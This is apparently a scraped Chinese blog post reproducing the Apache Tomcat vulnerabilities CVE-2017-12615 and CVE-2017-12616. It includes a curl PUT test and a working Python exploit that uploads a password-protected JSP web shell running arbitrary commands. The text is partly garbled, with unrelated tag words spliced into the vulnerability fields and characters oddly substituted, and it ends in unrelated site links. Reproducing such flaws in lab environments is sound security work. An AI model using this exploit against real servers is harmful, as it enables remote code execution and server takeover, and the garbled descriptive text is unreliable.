CVE-2017-12615漏洞复现附EXP
CVE-2017-12615复现
0x00 漏洞介绍
漏洞编号:java
CVE-2017-12615python
CVE-2017-12616linux
漏洞名称:git
CVE-2017-12615-远程代码执行漏洞github
CVE-2017-12616-信息泄露漏洞web
官方评级:docker
高危shell
漏洞描述:tomcat
CVE-2017-12616:信息泄露漏洞安全
当Tomcat中启用了 VirtualDirContext时,攻击者将能经过发送精心构造的恶意请求,绕过设置的相关安全限制,或是获取到由VirtualDirContext提供支持资源服务的JSP源代码,从而形成代码信息泄露。
CVE-2017-12615:远程代码执行漏洞
当 Tomcat运行在Windows操做系统时,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可经过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。致使服务器上的数据泄露或获取服务器权限。
经过以上两个漏洞可在用户服务器上执行任意代码,从而致使数据泄露或获取服务器权限,存在高安全风险。
漏洞利用条件和方式:
CVE-2017-12615漏洞利用须要在Windows环境,且须要将 readonly 初始化参数由默认值设置为 false,通过实际测试,Tomcat 7.x版本内web.xml配置文件内默认配置无readonly参数,须要手工添加,默认配置条件下不受此漏洞影响。
CVE-2017-12616漏洞须要在server.xml文件配置VirtualDirContext参数,通过实际测试,Tomcat 7.x版本内默认配置无VirtualDirContext参数,须要手工添加,默认配置条件下不受此漏洞影响。
漏洞影响范围:
CVE-2017-12616影响范围:Apache Tomcat 7.0.0 - 7.0.80
CVE-2017-12615影响范围: Apache Tomcat 7.0.0 - 7.0.79
0x01 环境搭建
使用docker搭建漏洞环境
github地址:
https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615
0x02 漏洞验证
这里我直接搭建在本地80端口上,linux系统下使用curl直接验证漏洞。
执行命令
curl -XPUT 127.0.0.1/2.jsp/ --data "test"
漏洞验证脚本
import requests
import sys
import time
'''
Usage:
python CVE-2017-12615.py http://127.0.0.1
shell: http://127.0.0.1/201712615.jsp?pwd=fff&cmd=whoami
'''
def attack(url):
user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
headers={"User-Agent":user_agent}
data="""<%
if("fff".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>"""
try:
requests.put(url, headers=headers, data=data)
time.sleep(2)
verify_response = requests.get(url[:-1], headers=headers)
if verify_response.status_code == 200:
print 'success!'
else :
print verify_response.status_code
except :
"error"
if __name__ == '__main__':
target_url = sys.argv[1] + '/201712615.jsp/'
attack(target_url)
print 'shell: ' + target_url[:-1]
- 1. 漏洞复现
- 2. csrf漏洞复现(附源码)
- 3. ssrf漏洞复现(附源码)
- 4. CVE-2020-0796_RCE(永恒之黑)漏洞exp复现
- 5. Redis 4.x5.x 未授权访问漏洞EXP复现过程
- 6. CVE-2020-0796_RCE漏洞exp复现(非蓝屏)
- 7. CVE-2020-0796 漏洞复现(rce)含exp教程
- 8. MS11_003漏洞复现
- 9. CMS漏洞复现
- 10. Everything漏洞复现
- 更多相关文章...
- • PHP exp() 函数 - PHP参考手册
- • ionic 复选框 - ionic 教程
- • ☆基于Java Instrument的Agent实现
- • Spring Cloud 微服务实战(三) - 服务注册与发现
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. python的安装和Hello,World编写
- 2. 重磅解读:K8s Cluster Autoscaler模块及对应华为云插件Deep Dive
- 3. 鸿蒙学习笔记2(永不断更)
- 4. static关键字 和构造代码块
- 5. JVM笔记
- 6. 无法启动 C/C++ 语言服务器。IntelliSense 功能将被禁用。错误: Missing binary at c:\Users\MSI-NB\.vscode\extensions\ms-vsc
- 7. 【Hive】Hive返回码状态含义
- 8. Java树形结构递归(以时间换空间)和非递归(以空间换时间)
- 9. 数据预处理---缺失值
- 10. 都要2021年了,现代C++有什么值得我们学习的?